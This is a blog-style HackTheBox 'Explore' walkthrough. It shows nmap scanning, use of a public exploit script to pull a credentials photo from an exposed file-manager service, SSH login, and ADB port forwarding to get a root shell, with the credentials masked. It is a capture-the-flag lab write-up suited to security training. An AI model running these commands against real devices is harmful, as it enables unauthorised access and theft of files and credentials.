HackTheBox : Explore Walkthrough

First glance

Now let’s get acquainted with our site.

The site is not opening. Ok then let’s do a port scan

Step 1.

Command: nmap -p- -T4 10.10.10.247

Now let’s take a closer look at the open ports.

Command: nmap -sC -sV -p 2222,5555,36145,42135,59777 10.10.10.247

Step 2.

We see something different here, let’s investigate immediately and find the appropriate exploit.

I looked at the first site and found the appropriate exploit.

As you can see, it is running on port 59777. When we look at the files here, we see the contents. I know where the file is because I already solved it. But you can have a look if you want.

Let ‘s do it.

Step 3.

Command: python3 50070.py listPics 10.10.10.247

Now let’s download the photo we need and see.

Command: python3 50070.py getFile 10.10.10.247 *******************

Bingo. We found the username and password from the photo.

Step 4.

Now let’s connect with an open ssh port.

Command: ssh *****@10.10.10.247 -p 2222

Check the files, find user.txt and look inside

Findout the user flag and submit to htb.

Get root

We saw freeciv at port 5555. If you want to know more, you can do this by searching the Internet. Let’s use it

Download the adb tool first

Command: apt-get install adb

send a port connection to ssh.

Command: ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222

İs now ready to connect. Let’s start

Command: adb connect localhost:5555

Check the devices

Command: adb devices

Enter Shell

Command: adb -s localhost:5555 shell

And it’s ready. We have gained root power. Find the root.txt and send the root flag.

Get Roota and find the flag.

Findout the root flag and submit to htb.

Good h4cks)

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Let’s Talk about Network Devices

Community Update Q4

Taking control of your DNS data!

📜 Crypto DAO Raises Funds to buy a Copy of US Constitution

Tracking Malware and Threat Actor Activity with Process Monitoring

A STORY OF OPEN REDIRECTION THROUGH REFERER HEADER.

Elliptic Curve Cryptography

Checking for Pegasus

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

TryHackMe — IDE

Security Explained: Regression Testing

HackTheBox — Pikaboo